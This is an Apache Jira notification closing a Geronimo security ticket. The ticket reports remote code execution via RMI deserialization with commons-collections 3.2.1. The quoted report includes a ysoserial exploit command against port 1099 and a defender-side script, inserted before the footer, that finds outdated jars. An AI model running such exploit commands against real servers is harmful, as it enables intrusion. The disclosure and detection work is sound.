[ https://issues.apache.org/jira/browse/GERONIMO-6596?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Mark Struberg closed GERONIMO-6596.
-----------------------------------
    Resolution: Won't Fix

Closing old outdated issues.

Note that the Apache Geronimo Application Server itself was declared EOL in 
2017 and we do not maintain the server parts anymore.

We still do actively maintain many of the Java EE / Jakarta EE components which 
saw the light during creation of the Apache Geronimo Application Server.
If you feel that this ticket still affects one of those components then please 
feel free to reopen the ticket.
Thanks, your Apache Geronimo team!

> Apache Geronimo Remote Code Execution Vulnerability
> ---------------------------------------------------
>
>                 Key: GERONIMO-6596
>                 URL: https://issues.apache.org/jira/browse/GERONIMO-6596
>             Project: Geronimo
>          Issue Type: Bug
>      Security Level: public(Regular issues) 
>          Components: dependencies, security
>    Affects Versions: 3.0.1
>         Environment: linux,windows
>            Reporter: sevck
>            Priority: Critical
>              Labels: issue
>
> The unsupported old Geronimo versions may also be affected.
> Description:
> Apache Geronimo enables the Java RMI port 1099 by default and binds it to 
> IP 0.0.0.0 by default. In bash, I used the "grep -R InvokerTransformer" 
> command and found that it uses commons-collections-3.2.1.jar by default.
> [root@localhost geronimo-tomcat7-javaee6-3.0.1]# grep -R InvokerTransformer .
> Binary file ./repository/commons-collections/commons-collections/3.2.1/commons-collections-3.2.1.jar matches
> This looks like Java deserialization is taken for granted. But when I used 
> the ysoserial tool's CommonsCollections1 payload, the response was:
> java.lang.ClassNotFoundException: 
> org.apache.commons.collections.map.TransformedMap (no security manager: RMI 
> class loader disabled)
> This seems to be a classpath error. In the Java version 7u21 changelog:
> -------------------------------------
> Changes to RMI
> From this release, the RMI property java.rmi.server.useCodebaseOnly is set to 
> true by default. In previous releases the default value was false.
> This change of default value may cause RMI-based applications to break 
> unexpectedly. The typical symptom is a stack trace that contains a 
> java.rmi.UnmarshalException containing a nested 
> java.lang.ClassNotFoundException.
> For more information, see RMI Enhancements.
> ---------------------------------------
> So, use 7u21 to run the application.
> attack server: 
> java -cp ysoserial-master-v0.0.5-gb617b7b-16.jar 
> ysoserial.exploit.RMIRegistryExploit 192.168.197.25 1099  Jdk7u21 "touch 
> /tmp/apache_geronimo"
> Mitigation:
> Commons-collections-3.2.1 users should upgrade to 3.2.2.
> Do not expose the ports to public access.
> Exploit:
> (precondition: the server runs JRE version 7u21)
> java -cp ysoserial-master-v0.0.5-gb617b7b-16.jar 
> ysoserial.exploit.RMIRegistryExploit 192.168.197.25 1099  Jdk7u21 "touch 
> /tmp/apache_geronimo"
> Credit:
> This issue was discovered by QingTeng cloud Security of Minded Security 
> Researcher jianan.huang
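A defender-side check for the first mitigation in the ticket, added here as an example and not part of the ticket, of Geronimo, or of ysoserial: a POSIX shell script that walks an installation tree and lists every commons-collections 3.x jar older than the 3.2.2 version the reporter names as fixed. The directory argument is assumed to be a Geronimo root such as the geronimo-tomcat7-javaee6-3.0.1 directory shown in the reporter's grep prompt; the repository/commons-collections/... layout is the one that grep output reveals.

```shell
#!/bin/sh
# List commons-collections 3.x jars below 3.2.2 under a directory tree.
# Added example (not Geronimo's own tooling). The directory argument is
# assumed to be a Geronimo install root; the ticket only shows that the
# vulnerable jar lives under repository/commons-collections/... there.

# cc_version_vulnerable VERSION
#   Returns 0 (true) when VERSION is in the 3.x line and below 3.2.2,
#   otherwise 1. Missing components ("3.2") count as 0.
cc_version_vulnerable() {
    echo "$1" | awk -F. '{
        major = $1 + 0; minor = $2 + 0; patch = $3 + 0;
        if (major == 3 && (minor < 2 || (minor == 2 && patch < 2))) exit 0;
        exit 1
    }'
}

# find_vulnerable_cc_jars DIR
#   Prints the path of every commons-collections-<version>.jar under DIR
#   whose version is below 3.2.2, one per line. The pattern deliberately
#   excludes commons-collections4-*.jar, which is a separate artifact line.
find_vulnerable_cc_jars() {
    find "$1" -type f -name 'commons-collections-[0-9]*.jar' |
    while IFS= read -r jar; do
        base=$(basename "$jar" .jar)
        ver=${base#commons-collections-}
        if cc_version_vulnerable "$ver"; then
            echo "$jar"
        fi
    done
}

# Stand-alone usage: sh check_cc.sh /path/to/geronimo-root
if [ "$#" -gt 0 ]; then
    vulnerable=$(find_vulnerable_cc_jars "$1")
    if [ -n "$vulnerable" ]; then
        echo "commons-collections jars older than 3.2.2 (upgrade them):"
        echo "$vulnerable"
        exit 2
    fi
    echo "No commons-collections jars older than 3.2.2 found under $1"
fi
```

The script finds the jar by file name only, so a shaded or renamed copy of the library would not be reported; pair it with the reporter's `grep -R InvokerTransformer` when file names cannot be trusted.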
--
This message was sent by Atlassian Jira
(v8.20.10#820010)